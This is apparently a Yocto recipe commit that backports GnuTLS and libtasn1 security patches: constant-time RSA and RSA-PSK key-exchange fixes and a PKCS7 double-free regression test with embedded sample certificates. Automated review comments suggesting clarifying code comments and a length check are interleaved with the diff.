++ "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\n"
++ "-----END PKCS7-----\n";
++
++const gnutls_datum_t rca_datum = { (void *)rca_pem, sizeof(rca_pem) - 1 };
++const gnutls_datum_t ca_datum = { (void *)ca_pem, sizeof(ca_pem) - 1 };
++const gnutls_datum_t ee_datum = { (void *)ee_pem, sizeof(ee_pem) - 1 };
++const gnutls_datum_t msg_datum = { (void *)msg_pem, sizeof(msg_pem) - 1 };
++
++static void tls_log_func(int level, const char *str)
++{
++ fprintf(stderr, "%s |<%d>| %s", "err", level, str);
++}
++
++#define CHECK(X)\
++{\
++ r = X;\
++ if (r < 0)\
++ fail("error in %d: %s\n", __LINE__, gnutls_strerror(r));\
++}\
++
++void doit(void)
++{
++ int r;
++ gnutls_x509_crt_t rca_cert = NULL;
++ gnutls_x509_crt_t ca_cert = NULL;
++ gnutls_x509_crt_t ee_cert = NULL;
++ gnutls_x509_trust_list_t tlist = NULL;
++ gnutls_pkcs7_t pkcs7 = NULL;
++ gnutls_datum_t data = { (unsigned char *)"xxx", 3 };
++
++ if (debug) {
++ gnutls_global_set_log_function(tls_log_func);
++ gnutls_global_set_log_level(4711);
++ }
++
++ // Import certificates
++ CHECK(gnutls_x509_crt_init(&rca_cert));
++ CHECK(gnutls_x509_crt_import(rca_cert, &rca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ca_cert));
++ CHECK(gnutls_x509_crt_import(ca_cert, &ca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ee_cert));
++ CHECK(gnutls_x509_crt_import(ee_cert, &ee_datum, GNUTLS_X509_FMT_PEM));
++
++ // Setup trust store
++ CHECK(gnutls_x509_trust_list_init(&tlist, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, rca_cert, "rca", 3, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ca_cert, "ca", 2, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ee_cert, "ee", 2, 0));
++
++ // Setup pkcs7 structure
++ CHECK(gnutls_pkcs7_init(&pkcs7));
++ CHECK(gnutls_pkcs7_import(pkcs7, &msg_datum, GNUTLS_X509_FMT_PEM));
++
++ // Signature verification
++ gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);
++
++ gnutls_x509_crt_deinit(rca_cert);
++ gnutls_x509_crt_deinit(ca_cert);
++ gnutls_x509_crt_deinit(ee_cert);
++ gnutls_x509_trust_list_deinit(tlist, 0);
++ gnutls_pkcs7_deinit(pkcs7);
++}
+--
+2.25.1
+
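Review bot: In `doit()` the result of `gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0)` is discarded without explanation, so the test reads as if a check was forgotten. The test can only fail by crashing, so a regression of the `prev != signer` guard in `find_signer` is caught reliably only when the allocator or a sanitizer aborts on the double free. A comment above the call would make that explicit, for example `/* result intentionally ignored: the test passes if verification does not double-free */`. It would also help to state in the file header that the test is meant to run under a memory checker where one is available.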
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
new file mode 100644
index 0000000000..943f4ca704
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
@@ -0,0 +1,85 @@
+From 80a6ce8ddb02477cd724cd5b2944791aaddb702a Mon Sep 17 00:00:00 2001
+From: Alexander Sosedkin <asosedkin@redhat.com>
+Date: Tue, 9 Aug 2022 16:05:53 +0200
+Subject: [PATCH] auth/rsa: side-step potential side-channel
+
+Signed-off-by: Alexander Sosedkin <asosedkin@redhat.com>
+Signed-off-by: Hubert Kario <hkario@redhat.com>
+Tested-by: Hubert Kario <hkario@redhat.com>
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/80a6ce8ddb02477cd724cd5b2944791aaddb702a
+ https://gitlab.com/gnutls/gnutls/-/commit/4b7ff428291c7ed77c6d2635577c83a43bbae558]
+CVE: CVE-2023-0361
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/auth/rsa.c | 30 +++---------------------------
+ 1 file changed, 3 insertions(+), 27 deletions(-)
+
+diff --git a/lib/auth/rsa.c b/lib/auth/rsa.c
+index 8108ee8..858701f 100644
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -155,13 +155,10 @@ static int
+ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ size_t _data_size)
+ {
+- const char attack_error[] = "auth_rsa: Possible PKCS #1 attack\n";
+ gnutls_datum_t ciphertext;
+ int ret, dsize;
+ ssize_t data_size = _data_size;
+ volatile uint8_t ver_maj, ver_min;
+- volatile uint8_t check_ver_min;
+- volatile uint32_t ok;
+
+ #ifdef ENABLE_SSL3
+ if (get_num_version(session) == GNUTLS_SSL3) {
+@@ -187,7 +184,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+
+ ver_maj = _gnutls_get_adv_version_major(session);
+ ver_min = _gnutls_get_adv_version_minor(session);
+- check_ver_min = (session->internals.allow_wrong_pms == 0);
+
+ session->key.key.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+ if (session->key.key.data == NULL) {
+@@ -206,10 +202,9 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ return ret;
+ }
+
+- ret =
+- gnutls_privkey_decrypt_data2(session->internals.selected_key,
+- 0, &ciphertext, session->key.key.data,
+- session->key.key.size);
++ gnutls_privkey_decrypt_data2(session->internals.selected_key,
++ 0, &ciphertext, session->key.key.data,
++ session->key.key.size);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+ * channel that can be used as an oracle, so treat very carefully */
+@@ -225,25 +220,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
+ */
+
+- /* ok is 0 in case of error and 1 in case of success. */
+-
+- /* if ret < 0 */
+- ok = CONSTCHECK_EQUAL(ret, 0);
+- /* session->key.key.data[0] must equal ver_maj */
+- ok &= CONSTCHECK_EQUAL(session->key.key.data[0], ver_maj);
+- /* if check_ver_min then session->key.key.data[1] must equal ver_min */
+- ok &= CONSTCHECK_NOT_EQUAL(check_ver_min, 0) &
+- CONSTCHECK_EQUAL(session->key.key.data[1], ver_min);
+-
+- if (ok) {
+- /* call logging function unconditionally so all branches are
+- * indistinguishable for timing and cache access when debug
+- * logging is disabled */
+- _gnutls_no_log("%s", attack_error);
+- } else {
+- _gnutls_debug_log("%s", attack_error);
+- }
+-
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+--
+2.25.1
+
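Review bot: After this change the return value of `gnutls_privkey_decrypt_data2(...)` in `proc_rsa_client_kx` is dropped silently, and nothing at the call site says that this is deliberate. A later cleanup or a static-analysis fix that restores `ret = ...` and branches on it would bring back the data-dependent path this patch removes. I would add a comment directly above the call, such as `/* return value deliberately unused: branching on it would re-create the decryption oracle */`. The function starts and ends outside the quoted hunks, so how the key buffer is filled before decryption is not visible here.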
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
new file mode 100644
index 0000000000..c518cfa0ac
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
@@ -0,0 +1,206 @@
+Backport of:
+
+From 29d6298d0b04cfff970b993915db71ba3f580b6d Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Mon, 23 Oct 2023 09:26:57 +0900
+Subject: [PATCH] auth/rsa_psk: side-step potential side-channel
+
+This removes branching that depends on secret data, porting changes
+for regular RSA key exchange from
+4804febddc2ed958e5ae774de2a8f85edeeff538 and
+80a6ce8ddb02477cd724cd5b2944791aaddb702a. This also removes the
+allow_wrong_pms as it was used sorely to control debug output
+depending on the branching.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/gnutls28/3.6.13-2ubuntu1.9/gnutls28_3.6.13-2ubuntu1.9.debian.tar.xz
+Upstream-Commit: https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]
+CVE: CVE-2023-5981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa.c | 2 +-
+ lib/auth/rsa_psk.c | 90 ++++++++++++++++++----------------------------
+ lib/gnutls_int.h | 4 ---
+ lib/priority.c | 1 -
+ 4 files changed, 35 insertions(+), 62 deletions(-)
+
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -207,7 +207,7 @@ proc_rsa_client_kx(gnutls_session_t sess
+ session->key.key.size);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+- * channel that can be used as an oracle, so treat very carefully */
++ * channel that can be used as an oracle, so tread carefully */
+
+ /* Error handling logic:
+ * In case decryption fails then don't inform the peer. Just use the
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -264,14 +264,13 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ {
+ gnutls_datum_t username;
+ psk_auth_info_t info;
+- gnutls_datum_t plaintext;
+ gnutls_datum_t ciphertext;
+ gnutls_datum_t pwd_psk = { NULL, 0 };
+ int ret, dsize;
+- int randomize_key = 0;
+ ssize_t data_size = _data_size;
+ gnutls_psk_server_credentials_t cred;
+ gnutls_datum_t premaster_secret = { NULL, 0 };
++ volatile uint8_t ver_maj, ver_min;
+
+ cred = (gnutls_psk_server_credentials_t)
+ _gnutls_get_cred(session, GNUTLS_CRD_PSK);
+@@ -327,71 +326,47 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ }
+ ciphertext.size = dsize;
+
+- ret =
+- gnutls_privkey_decrypt_data(session->internals.selected_key, 0,
+- &ciphertext, &plaintext);
+- if (ret < 0 || plaintext.size != GNUTLS_MASTER_SIZE) {
+- /* In case decryption fails then don't inform
+- * the peer. Just use a random key. (in order to avoid
+- * attack against pkcs-1 formatting).
+- */
+- gnutls_assert();
+- _gnutls_debug_log
+- ("auth_rsa_psk: Possible PKCS #1 format attack\n");
+- if (ret >= 0) {
+- gnutls_free(plaintext.data);
+- }
+- randomize_key = 1;
+- } else {
+- /* If the secret was properly formatted, then
+- * check the version number.
+- */
+- if (_gnutls_get_adv_version_major(session) !=
+- plaintext.data[0]
+- || (session->internals.allow_wrong_pms == 0
+- && _gnutls_get_adv_version_minor(session) !=
+- plaintext.data[1])) {
+- /* No error is returned here, if the version number check
+- * fails. We proceed normally.
+- * That is to defend against the attack described in the paper
+- * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
+- * Ondej Pokorny and Tomas Rosa.
+- */
+- gnutls_assert();
+- _gnutls_debug_log
+- ("auth_rsa: Possible PKCS #1 version check format attack\n");
+- }
+- }
++ ver_maj = _gnutls_get_adv_version_major(session);
++ ver_min = _gnutls_get_adv_version_minor(session);
+
++ premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
++ if (premaster_secret.data == NULL) {
++ gnutls_assert();
++ return GNUTLS_E_MEMORY_ERROR;
++ }
++ premaster_secret.size = GNUTLS_MASTER_SIZE;
+
+- if (randomize_key != 0) {
+- premaster_secret.size = GNUTLS_MASTER_SIZE;
+- premaster_secret.data =
+- gnutls_malloc(premaster_secret.size);
+- if (premaster_secret.data == NULL) {
+- gnutls_assert();
+- return GNUTLS_E_MEMORY_ERROR;
+- }
+-
+- /* we do not need strong random numbers here.
+- */
+- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+- premaster_secret.size);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+- } else {
+- premaster_secret.data = plaintext.data;
+- premaster_secret.size = plaintext.size;
++ /* Fallback value when decryption fails. Needs to be unpredictable. */
++ ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
++ premaster_secret.size);
++ if (ret < 0) {
++ gnutls_assert();
++ goto cleanup;
+ }
+
++ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
++ &ciphertext, premaster_secret.data,
++ premaster_secret.size);
++ /* After this point, any conditional on failure that cause differences
++ * in execution may create a timing or cache access pattern side
++ * channel that can be used as an oracle, so tread carefully */
++
++ /* Error handling logic:
++ * In case decryption fails then don't inform the peer. Just use the
++ * random key previously generated. (in order to avoid attack against
++ * pkcs-1 formatting).
++ *
++ * If we get version mismatches no error is returned either. We
++ * proceed normally. This is to defend against the attack described
++ * in the paper "Attacking RSA-based sessions in SSL/TLS" by
++ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
++ */
++
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+-
+- premaster_secret.data[0] = _gnutls_get_adv_version_major(session);
+- premaster_secret.data[1] = _gnutls_get_adv_version_minor(session);
++ premaster_secret.data[0] = ver_maj;
++ premaster_secret.data[1] = ver_min;
+
+ /* find the key of this username
+ */
+--- a/lib/gnutls_int.h
++++ b/lib/gnutls_int.h
+@@ -989,7 +989,6 @@ struct gnutls_priority_st {
+ bool _no_etm;
+ bool _no_ext_master_secret;
+ bool _allow_key_usage_violation;
+- bool _allow_wrong_pms;
+ bool _dumbfw;
+ unsigned int _dh_prime_bits; /* old (deprecated) variable */
+
+@@ -1007,7 +1006,6 @@ struct gnutls_priority_st {
+ (x)->no_etm = 1; \
+ (x)->no_ext_master_secret = 1; \
+ (x)->allow_key_usage_violation = 1; \
+- (x)->allow_wrong_pms = 1; \
+ (x)->dumbfw = 1
+
+ #define ENABLE_PRIO_COMPAT(x) \
+@@ -1016,7 +1014,6 @@ struct gnutls_priority_st {
+ (x)->_no_etm = 1; \
+ (x)->_no_ext_master_secret = 1; \
+ (x)->_allow_key_usage_violation = 1; \
+- (x)->_allow_wrong_pms = 1; \
+ (x)->_dumbfw = 1
+
+ /* DH and RSA parameters types.
+@@ -1141,7 +1138,6 @@ typedef struct {
+ bool no_etm;
+ bool no_ext_master_secret;
+ bool allow_key_usage_violation;
+- bool allow_wrong_pms;
+ bool dumbfw;
+
+ /* old (deprecated) variable. This is used for both srp_prime_bits
+--- a/lib/priority.c
++++ b/lib/priority.c
+@@ -681,7 +681,6 @@ gnutls_priority_set(gnutls_session_t ses
+ COPY_TO_INTERNALS(no_etm);
+ COPY_TO_INTERNALS(no_ext_master_secret);
+ COPY_TO_INTERNALS(allow_key_usage_violation);
+- COPY_TO_INTERNALS(allow_wrong_pms);
+ COPY_TO_INTERNALS(dumbfw);
+ COPY_TO_INTERNALS(dh_prime_bits);
+
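Review bot: The `Upstream-Status:` tag in this header opens its bracket on a Launchpad tarball URL and closes it a line later, after an embedded `Upstream-Commit:` field, so the status value spans two lines and names a distribution archive rather than the upstream commit. The neighbouring patches use a single-line `Upstream-Status: Backport [<gitlab commit URL>]`. Following that form here, `Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]`, with the Ubuntu source mentioned in a plain sentence below it, keeps the provenance checkable against the upstream repository and is more likely to be parsed as intended by tag-checking scripts.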
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
new file mode 100644
index 0000000000..f15c470879
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
@@ -0,0 +1,125 @@
+From 40dbbd8de499668590e8af51a15799fbc430595e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 10 Jan 2024 19:13:17 +0900
+Subject: [PATCH] rsa-psk: minimize branching after decryption
+
+This moves any non-trivial code between gnutls_privkey_decrypt_data2
+and the function return in _gnutls_proc_rsa_psk_client_kx up until the
+decryption. This also avoids an extra memcpy to session->key.key.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/40dbbd8de499668590e8af51a15799fbc430595e]
+CVE: CVE-2024-0553
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa_psk.c | 68 ++++++++++++++++++++++++----------------------
+ 1 file changed, 35 insertions(+), 33 deletions(-)
+
+diff --git a/lib/auth/rsa_psk.c b/lib/auth/rsa_psk.c
+index 93c2dc9..c6cfb92 100644
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -269,7 +269,6 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ int ret, dsize;
+ ssize_t data_size = _data_size;
+ gnutls_psk_server_credentials_t cred;
+- gnutls_datum_t premaster_secret = { NULL, 0 };
+ volatile uint8_t ver_maj, ver_min;
+
+ cred = (gnutls_psk_server_credentials_t)
+@@ -329,24 +328,48 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ ver_maj = _gnutls_get_adv_version_major(session);
+ ver_min = _gnutls_get_adv_version_minor(session);
+
+- premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+- if (premaster_secret.data == NULL) {
++ /* Find the key of this username. A random value will be
++ * filled in if the key is not found.
++ */
++ ret = _gnutls_psk_pwd_find_entry(session, info->username,
++ strlen(info->username), &pwd_psk);
++ if (ret < 0)
++ return gnutls_assert_val(ret);
++
++ /* Allocate memory for premaster secret, and fill in the
++ * fields except the decryption result.
++ */
++ session->key.key.size = 2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size;
++ session->key.key.data = gnutls_malloc(session->key.key.size);
++ if (session->key.key.data == NULL) {
+ gnutls_assert();
++ _gnutls_free_key_datum(&pwd_psk);
++ /* No need to zeroize, as the secret is not copied in yet */
++ _gnutls_free_datum(&session->key.key);
+ return GNUTLS_E_MEMORY_ERROR;
+ }
+- premaster_secret.size = GNUTLS_MASTER_SIZE;
+
+ /* Fallback value when decryption fails. Needs to be unpredictable. */
+- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+- premaster_secret.size);
++ ret = gnutls_rnd(GNUTLS_RND_NONCE, session->key.key.data + 2,
++ GNUTLS_MASTER_SIZE);
+ if (ret < 0) {
+ gnutls_assert();
+- goto cleanup;
++ _gnutls_free_key_datum(&pwd_psk);
++ /* No need to zeroize, as the secret is not copied in yet */
++ _gnutls_free_datum(&session->key.key);
++ return ret;
+ }
+
++ _gnutls_write_uint16(GNUTLS_MASTER_SIZE, session->key.key.data);
++ _gnutls_write_uint16(pwd_psk.size,
++ &session->key.key.data[2 + GNUTLS_MASTER_SIZE]);
++ memcpy(&session->key.key.data[2 + GNUTLS_MASTER_SIZE + 2], pwd_psk.data,
++ pwd_psk.size);
++ _gnutls_free_key_datum(&pwd_psk);
++
+ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
+- &ciphertext, premaster_secret.data,
+- premaster_secret.size);
++ &ciphertext, session->key.key.data + 2,
++ GNUTLS_MASTER_SIZE);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+ * channel that can be used as an oracle, so tread carefully */
+@@ -365,31 +388,10 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+- premaster_secret.data[0] = ver_maj;
+- premaster_secret.data[1] = ver_min;
++ session->key.key.data[2] = ver_maj;
++ session->key.key.data[3] = ver_min;
+
+- /* find the key of this username
+- */
+- ret =
+- _gnutls_psk_pwd_find_entry(session, info->username, strlen(info->username), &pwd_psk);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+-
+- ret =
+- set_rsa_psk_session_key(session, &pwd_psk, &premaster_secret);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+-
+- ret = 0;
+- cleanup:
+- _gnutls_free_key_datum(&pwd_psk);
+- _gnutls_free_temp_key_datum(&premaster_secret);
+-
+- return ret;
++ return 0;
+ }
+
+ static int
+--
+2.25.1
+
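Review bot: `pwd_psk.size` is written into a 16-bit length prefix with `_gnutls_write_uint16(pwd_psk.size, ...)` while the following `memcpy` copies the full `pwd_psk.size` bytes, and the hunk shows no bound on that size. If `_gnutls_psk_pwd_find_entry` does not already cap the key length (not visible here), a key longer than 65535 bytes would produce a prefix that disagrees with the data behind it. A guard placed before the allocation, and therefore before the decryption so that it adds no post-decryption branch, would close that: `if (pwd_psk.size > 0xFFFF) { _gnutls_free_key_datum(&pwd_psk); return gnutls_assert_val(GNUTLS_E_INTERNAL_ERROR); }`, with whichever error code the project prefers. The removed `set_rsa_psk_session_key` path may have had the same property; `_gnutls_proc_rsa_psk_client_kx` starts outside the hunk.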
diff --git a/meta/recipes-support/gnutls/gnutls_3.6.14.bb b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
index 51578b4b3b..a1451daf2c 100644
--- a/meta/recipes-support/gnutls/gnutls_3.6.14.bb
+++ b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
@@ -1,5 +1,7 @@
SUMMARY = "GNU Transport Layer Security Library"
-HOMEPAGE = "http://www.gnu.org/software/gnutls/"
+DESCRIPTION = "a secure communications library implementing the SSL, \
+TLS and DTLS protocols and technologies around them."
+HOMEPAGE = "https://gnutls.org/"
BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls"
LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -21,6 +23,13 @@ SRC_URI = "https://www.gnupg.org/ftp/gcrypt/gnutls/v${SHRT_VER}/gnutls-${PV}.tar
file://arm_eabi.patch \
file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \
file://CVE-2020-24659.patch \
+ file://CVE-2021-20231.patch \
+ file://CVE-2021-20232.patch \
+ file://CVE-2022-2509.patch \
+ file://CVE-2021-4209.patch \
+ file://CVE-2023-0361.patch \
+ file://CVE-2023-5981.patch \
+ file://CVE-2024-0553.patch \
"
SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63"
diff --git a/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
new file mode 100644
index 0000000000..9a8ceecbe7
--- /dev/null
+++ b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
@@ -0,0 +1,45 @@
+From 22fd12b290adea788122044cb58dc9e77754644f Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Thu, 17 Nov 2022 12:07:50 +0530
+Subject: [PATCH] CVE-2021-46848
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5]
+CVE: CVE-2021-46848
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+Fix ETYPE_OK off by one array size check.
+---
+ NEWS | 4 ++++
+ lib/int.h | 2 +-
